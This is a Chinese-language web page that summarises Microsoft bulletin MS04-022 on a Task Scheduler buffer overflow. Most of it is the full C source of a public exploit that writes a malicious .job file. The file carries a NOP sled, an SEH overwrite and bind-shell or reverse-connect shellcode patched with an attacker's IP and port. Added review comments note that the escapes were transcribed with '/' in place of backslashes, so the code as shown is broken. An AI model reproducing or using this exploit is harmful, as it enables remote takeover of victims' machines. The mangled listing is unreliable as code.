Microsoft 安全公告 MS04-022 溢出攻击代码

Microsoft 安全公告 MS04-022 溢出攻击代码

漏洞描述
任务计划程序漏洞 — CAN-2004-0212

此漏洞的影响范围有多大?
这是一个远程执行代码漏洞。如果用户使用管理权限登录,成功利用此漏洞的攻击者可以完全控制受影响的系统,包括安装程序;查看、更改或删除数据;或者创建拥有完全权限的新帐户。帐户被配置为拥有较少系统权限的用户,比具有管理权限的用户受到的威胁要小。不过,要利用此漏洞,需要进行用户交互。

此漏洞因何而起?
任务计划程序组件中未经检查的缓冲区。

什么是任务计划程序?
您可以使用任务计划程序,计划在特定时间运行命令、程序或脚本。可将任务保存为具有 .job 文件扩展名的文件。这样,就可以更方便地在系统之间移动任务信息。管理员可以创建计划的维护任务文件,并将其放在需要的地方。有关详细信息,请参见任务计划程序 Web 站点。

攻击者可能利用此漏洞执行什么操作?
成功利用此漏洞的攻击者可以完全控制受影响的系统,其中包括:安装程序;查看、更改或删除数据;或者创建拥有完全权限的新帐户等。

攻击者如何利用此漏洞?
攻击者可能使用多种方法来攻击系统。下面是一些示例:

• 攻击者可能拥有一个旨在通过 Internet Explorer 利用此漏洞的恶意 Web 站点,然后诱使用户查看这个 Web 站点。
 
• 攻击者可能将特制 .job 文件添加到本地文件系统或网络共享上,然后诱使用户使用 Windows 资源管理器来查看该文件夹。
 
• 攻击者也可能通过其他途径访问受影响的组件。例如,攻击者可以以交互方式登录到系统,或者使用其他程序(在本地或远程)向易受攻击的组件传递参数。
 

Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022) 
 


/* HOD-ms04022-task-expl.c:
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * Exploit version 0.1 coded by
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 * [at inbox dot ru]
 * -------------------------------------------------------------------
 * Tested on:
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe)
 *    - Explorer (explorer.exe)
 *    - Windows XP SP0, SP1
 *
 * -------------------------------------------------------------------
 * Compile:
 *    Win32/VC++  : cl HOD-ms04022-task-expl.c
 *    Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
 *    Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
 *
 * -------------------------------------------------------------------
 * Command Line Parameters/Arguments:
 *
 *   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
 *
 *   Shellcode:
 *        1 - Portbind shellcode
 *        2 - Connectback shellcode
 *
 * -------------------------------------------------------------------
 * Example:
 *
 * C:/>HOD-ms04022-task-expl.exe expl.job 1 7777
 *
 * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
 *
 * --- Coded by .::[ houseofdabus ]::. ---
 *
 * [*] Shellcode: Portbind, port = 7777
 * [*] Generate file: expl.job
 *
 * C:/>
 *
 * start IE -> C:/
 *
 * C:/>telnet localhost 7777
 * Microsoft Windows XP [偉噌 5.1.2600]
 * (? 姰喁 妯??nbsp;┆喈岙溻, 1985-2001.
 *
 * C:/Documents and Settings/v.X/?nbsp;‘绋?徕>
 *
 * -------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>

#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif

 

/*
 * Template body of the generated .job (Task Scheduler job) file.
 *
 * main() writes this buffer to the output first, then seeks to offset 70
 * to overwrite the two-byte length field (the "/x11/x11" placeholder
 * below) and to offset 39*16 = 624 to append the selected payload
 * followed by endofjob.
 *
 * NOTE(review): in this transcription every backslash has become '/', so
 * "/x01" is four ASCII characters rather than a byte escape. The byte
 * counts and offsets in the comments only hold for the original escaped
 * form; the listing as shown does not produce the bytes described.
 *
 * Detection note: what is presumably the job's Unicode application-path
 * field (author's "garbage C:/...") consists of a short "C:\a." prefix, a
 * long run of 0x90 (x86 NOP) and a fixed advapi32.dll address. A .job
 * whose path field looks like this is malformed by construction, which
 * makes it a usable content signature for scanners and mail/web filters.
 */
unsigned char jobfile[] =

/* job header: 4 rows of 16 bytes plus one of 6 = 70 bytes before the length field */
"/x01/x05/x01/x00/xD9/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF"
"/xFF/xFF/xFF/xFF/x46/x00/x92/x00/x00/x00/x00/x00/x3C/x00/x0A/x00"
"/x20/x00/x00/x00/x00/x14/x73/x0F/x00/x00/x00/x00/x03/x13/x04/x00"
"/xC0/x00/x80/x21/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00"

/* length: 2-byte placeholder at offset 70; main() seeks back and overwrites it */
"/x11/x11"

/* garbage C:/... */
/* unicode: UTF-16LE "C:\a." (43 00 3A 00 5C 00 61 00 2E 00), then 0x90 filler */
"/x43/x00/x3A/x00/x5C/x00/x61/x00"
"/x2E/x00/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"

/* little-endian encoding of the address named in the next comment; presumably
 * specific to the XP SP0/SP1 advapi32.dll builds listed in the file header */
"/x1E/x82/xDC/x77"

/* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
/* for Win2k use jmp ebx or call ebx  */

"/x61/x61/x61/x61/x61/x61/x61/x61/x61/x61/x61/x61"
"/x80/x31/x31/x80" /* generate exception */

"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x90/x90";

 

/* portbind shellcode */
/*
 * Bind-shell payload template, selected with shellcode argument 1.
 *
 * main() patches the listening port into this buffer in memory through
 * SET_PORTBIND_PORT (offset 300+16, see the macros below) before writing
 * it, so the bytes here are a template rather than the final payload.
 * The five short rows at the top add up to 16 bytes, which appears to be
 * what the +16 in the macros skips; the author marks them as the
 * overwritten SEH record. Only the author's own annotations describe the
 * body; nothing beyond them is asserted here.
 */
unsigned char portbindsc[] =
"/x90/x90"
"/x90/x90/xEB/x06" /* overwrite SEH-frame */
"/x90/x90"
"/x90/x90/x90/x90"
"/x90/x90/x90/x90"

"/xeb/x70/x56/x33/xc0/x64/x8b/x40/x30/x85/xc0/x78/x0c/x8b/x40/x0c"
"/x8b/x70/x1c/xad/x8b/x40/x08/xeb/x09/x8b/x40/x34/x8d/x40/x7c/x8b"
"/x40/x3c/x5e/xc3/x60/x8b/x6c/x24/x24/x8b/x45/x3c/x8b/x54/x05/x78"
"/x03/xd5/x8b/x4a/x18/x8b/x5a/x20/x03/xdd/xe3/x34/x49/x8b/x34/x8b"
"/x03/xf5/x33/xff/x33/xc0/xfc/xac/x84/xc0/x74/x07/xc1/xcf/x0d/x03"
"/xf8/xeb/xf4/x3b/x7c/x24/x28/x75/xe1/x8b/x5a/x24/x03/xdd/x66/x8b"
"/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/x89/x44/x24/x1c"
"/x61/xc3/xeb/x3d/xad/x50/x52/xe8/xa8/xff/xff/xff/x89/x07/x83/xc4"
"/x08/x83/xc7/x04/x3b/xf1/x75/xec/xc3/x8e/x4e/x0e/xec/x72/xfe/xb3"
"/x16/x7e/xd8/xe2/x73/xad/xd9/x05/xce/xd9/x09/xf5/xad/xa4/x1a/x70"
"/xc7/xa4/xad/x2e/xe9/xe5/x49/x86/x49/xcb/xed/xfc/x3b/xe7/x79/xc6"
"/x79/x83/xec/x60/x8b/xec/xeb/x02/xeb/x05/xe8/xf9/xff/xff/xff/x5e"
"/xe8/x3d/xff/xff/xff/x8b/xd0/x83/xee/x36/x8d/x7d/x04/x8b/xce/x83"
"/xc1/x10/xe8/x9d/xff/xff/xff/x83/xc1/x18/x33/xc0/x66/xb8/x33/x32"
"/x50/x68/x77/x73/x32/x5f/x8b/xdc/x51/x52/x53/xff/x55/x04/x5a/x59"
"/x8b/xd0/xe8/x7d/xff/xff/xff/xb8/x01/x63/x6d/x64/xc1/xf8/x08/x50"
"/x89/x65/x34/x33/xc0/x66/xb8/x90/x01/x2b/xe0/x54/x83/xc0/x72/x50"
"/xff/x55/x24/x33/xc0/x50/x50/x50/x50/x40/x50/x40/x50/xff/x55/x14"
"/x8b/xf0/x33/xc0/x33/xdb/x50/x50/x50/xb8/x02/x01/x11/x5c/xfe/xcc"
"/x50/x8b/xc4/xb3/x10/x53/x50/x56/xff/x55/x18/x53/x56/xff/x55/x1c"
"/x53/x8b/xd4/x2b/xe3/x8b/xcc/x52/x51/x56/xff/x55/x20/x8b/xf0/x33"
"/xc9/xb1/x54/x2b/xe1/x8b/xfc/x57/x33/xc0/xf3/xaa/x5f/xc6/x07/x44"
"/xfe/x47/x2d/x57/x8b/xc6/x8d/x7f/x38/xab/xab/xab/x5f/x33/xc0/x8d"
"/x77/x44/x56/x57/x50/x50/x50/x40/x50/x48/x50/x50/xff/x75/x34/x50"
"/xff/x55/x08/xf7/xd0/x50/xff/x36/xff/x55/x10/xff/x77/x38/xff/x55"
"/x28/xff/x55/x0c";

 

/* connectback shellcode */
/*
 * Reverse-connect payload template, selected with shellcode argument 2.
 *
 * main() patches the target IPv4 address (SET_CONNECTBACK_IP, offset
 * 283+16) and port (SET_CONNECTBACK_PORT, offset 290+16) into this buffer
 * in memory before writing it; both values are taken from argv[4] and
 * argv[3]. As with portbindsc, the five short rows at the top total
 * 16 bytes and are the author's "overwrite SEH-frame" preamble.
 *
 * Detection note: a generated file therefore embeds a literal destination
 * IP and port; those bytes are a natural pivot for network-side blocking
 * and for correlating the file with outbound connection attempts.
 */
unsigned char connectbacksc[] =
"/x90/x90"
"/x90/x90/xEB/x06" /* overwrite SEH-frame */
"/x90/x90"
"/x90/x90/x90/x90"
"/x90/x90/x90/x90"

"/xeb/x70/x56/x33/xc0/x64/x8b/x40/x30/x85/xc0/x78/x0c/x8b/x40/x0c"
"/x8b/x70/x1c/xad/x8b/x40/x08/xeb/x09/x8b/x40/x34/x8d/x40/x7c/x8b"
"/x40/x3c/x5e/xc3/x60/x8b/x6c/x24/x24/x8b/x45/x3c/x8b/x54/x05/x78"
"/x03/xd5/x8b/x4a/x18/x8b/x5a/x20/x03/xdd/xe3/x34/x49/x8b/x34/x8b"
"/x03/xf5/x33/xff/x33/xc0/xfc/xac/x84/xc0/x74/x07/xc1/xcf/x0d/x03"
"/xf8/xeb/xf4/x3b/x7c/x24/x28/x75/xe1/x8b/x5a/x24/x03/xdd/x66/x8b"
"/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/x89/x44/x24/x1c"
"/x61/xc3/xeb/x35/xad/x50/x52/xe8/xa8/xff/xff/xff/x89/x07/x83/xc4"
"/x08/x83/xc7/x04/x3b/xf1/x75/xec/xc3/x8e/x4e/x0e/xec/x72/xfe/xb3"
"/x16/x7e/xd8/xe2/x73/xad/xd9/x05/xce/xd9/x09/xf5/xad/xec/xf9/xaa"
"/x60/xcb/xed/xfc/x3b/xe7/x79/xc6/x79/x83/xec/x60/x8b/xec/xeb/x02"
"/xeb/x05/xe8/xf9/xff/xff/xff/x5e/xe8/x45/xff/xff/xff/x8b/xd0/x83"
"/xee/x2e/x8d/x7d/x04/x8b/xce/x83/xc1/x10/xe8/xa5/xff/xff/xff/x83"
"/xc1/x10/x33/xc0/x66/xb8/x33/x32/x50/x68/x77/x73/x32/x5f/x8b/xdc"
"/x51/x52/x53/xff/x55/x04/x5a/x59/x8b/xd0/xe8/x85/xff/xff/xff/xb8"
"/x01/x63/x6d/x64/xc1/xf8/x08/x50/x89/x65/x30/x33/xc0/x66/xb8/x90"
"/x01/x2b/xe0/x54/x83/xc0/x72/x50/xff/x55/x1c/x33/xc0/x50/x50/x50"
"/x50/x40/x50/x40/x50/xff/x55/x14/x8b/xf0/x68/x7f/x01/x01/x01/xb8"
"/x02/x01/x11/x5c/xfe/xcc/x50/x8b/xdc/x33/xc0/xb0/x10/x50/x53/x56"
"/xff/x55/x18/x33/xc9/xb1/x54/x2b/xe1/x8b/xfc/x57/x33/xc0/xf3/xaa"
"/x5f/xc6/x07/x44/xfe/x47/x2d/x57/x8b/xc6/x8d/x7f/x38/xab/xab/xab"
"/x5f/x33/xc0/x8d/x77/x44/x56/x57/x50/x50/x50/x40/x50/x48/x50/x50"
"/xff/x75/x30/x50/xff/x55/x08/xf7/xd0/x50/xff/x36/xff/x55/x10/xff"
"/x77/x38/xff/x55/x20/xff/x55/x0c";

 

/* use this form
unsigned char sc[] =
"/x90/x90"
"/x90/x90/xEB/x06" - overwrite SEH-frame
"/x90/x90"
"/x90/x90/x90/x90"
"/x90/x90/x90/x90"

"... code ...";
*/

/* Trailer appended after the payload: main() writes exactly 4 bytes of it
 * (fwrite(endofjob, 1, 4, fp)); with the transcribed "/x00" text each
 * "byte" is four ASCII characters, so only the first "/x00" would be copied. */
unsigned char endofjob[] = "/x00/x00/x00/x00";

/*
 * In-place patching of the payload templates. Each macro stores a value at
 * a fixed offset inside the given unsigned char buffer: +16 skips the
 * 16-byte preamble rows at the top of each payload, and the first number is
 * the field's offset within the payload body. main() passes htons() values
 * for the ports, so those fields end up in network byte order.
 *
 * NOTE(review): these are type-punning stores through `unsigned short *` /
 * `unsigned long *` into a char array - potentially unaligned and a
 * strict-aliasing violation (undefined behaviour in C). `unsigned long` is
 * 8 bytes on LP64 targets (e.g. x86-64 Linux, one of the listed build
 * targets), so SET_CONNECTBACK_IP stores 8 bytes there rather than the 4 of
 * an IPv4 address. The macros also evaluate `buf` once but are not
 * parenthesised as expressions, so they are statement-only.
 */
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip)     *(unsigned long *)(((buf)+283+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)

/*
 * Print the command-line synopsis and terminate the process.
 *
 * @param prog  argv[0], echoed into the synopsis line.
 *
 * Never returns: ends with exit(0). The original exits 0 even though this
 * is reached on a usage error; that behaviour is preserved here. The "/n"
 * sequences are how the page transcribed the newline escapes and are
 * reproduced verbatim.
 */
void
usage(char *prog)
{
 /* Lines without conversion specifiers go through fputs, which writes the
  * same bytes as the original printf calls; only the synopsis needs printf. */
 fputs("Usage:/n", stdout);
 printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]/n", prog);
 fputs("/nShellcode:/n", stdout);
 fputs("      1 - Portbind shellcode/n", stdout);
 fputs("      2 - Connectback shellcode/n/n", stdout);
 exit(0);
}

/*
 * Entry point. Writes a crafted .job file to argv[1]: the jobfile template,
 * then the payload selected by argv[2] (1 = portbind, anything else that
 * passes the checks = connectback) with the port from argv[3] and, for
 * connectback, the IPv4 address from argv[4]; finally the header's length
 * field at offset 70 is patched.
 *
 * @return 0 on success; exit(0) is also used on argument and fopen errors,
 *         so the exit status never signals failure.
 *
 * NOTE(review): argument validation is loose. argv[2] is parsed with atoi
 * and only "2 without argv[4]" and values > 2 are rejected, so a
 * non-numeric or "0" argv[2] with argc == 4 reaches the else branch and
 * passes argv[4] (NULL) to inet_addr. fwrite/fseek/fclose results are
 * never checked, and fp2 is declared but unused.
 */
int
main(int argc, char **argv)
{
 unsigned short strlen;   /* value for the header length field; shadows the libc name strlen */
 unsigned short port;     /* atoi(argv[3]) truncated to 16 bits, no range check */
 unsigned long ip, sc;    /* ip: inet_addr() result; sc: payload selector (negative atoi wraps to a huge value and is rejected) */
 FILE *fp, *fp2;          /* fp2 is never used */

 printf("/n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit/n/n");
 printf("--- Coded by .::[ houseofdabus ]::. ---/n/n");

 if (argc < 4) usage(argv[0]);

 sc = atoi(argv[2]);
 /* connectback needs argv[4]; selector 0 is not rejected here (see note above) */
 if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

 fp = fopen(argv[1], "wb");
 if (fp == NULL) {
  printf("[-] error: can/'t create file: %s/n", argv[1]);
  exit(0);   /* exits 0 on failure */
 }

 /* header & garbage: the whole jobfile template, minus its NUL terminator */
 fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
 /* 39*16 = 624; presumably the byte length of the original (escaped) jobfile,
  * i.e. position at the end of the template before appending -- confirm */
 fseek(fp, 39*16, SEEK_SET);

 port = atoi(argv[3]);
 printf("[*] Shellcode: ");
 if (sc == 1) {
  /* patch the listening port (network byte order) into the in-memory template */
  SET_PORTBIND_PORT(portbindsc, htons(port));
  printf("Portbind, port = %u/n", port);
  fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
  fwrite(endofjob, 1, 4, fp);
  /* back to the 2-byte length field at offset 70 of the header */
  fseek(fp, 70, SEEK_SET);
  /* calculate length (see header): presumably the count of 16-bit units
   * following the length field -- confirm against the .job format */
  strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
 }
 else {
  /* argv[4] is only guaranteed to exist when sc == 2 (see note above) */
  ip = inet_addr(argv[4]);
  SET_CONNECTBACK_IP(connectbacksc, ip);
  SET_CONNECTBACK_PORT(connectbacksc, htons(port));
  printf("Connectback, port = %u, IP = %s/n", port, argv[4]);
  fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
  fwrite(endofjob, 1, 4, fp);
  /* back to the 2-byte length field at offset 70 of the header */
  fseek(fp, 70, SEEK_SET);
  /* calculate length (see header): same formula as the portbind branch */
  strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
 }

 printf("[*] Generate file: %s/n", argv[1]);
 /* raw 2-byte store, i.e. host byte order (little-endian on x86) */
 fwrite(&strlen, 1, 2, fp);
 fclose(fp);   /* return value unchecked; a failed flush goes unnoticed */

return 0;
}
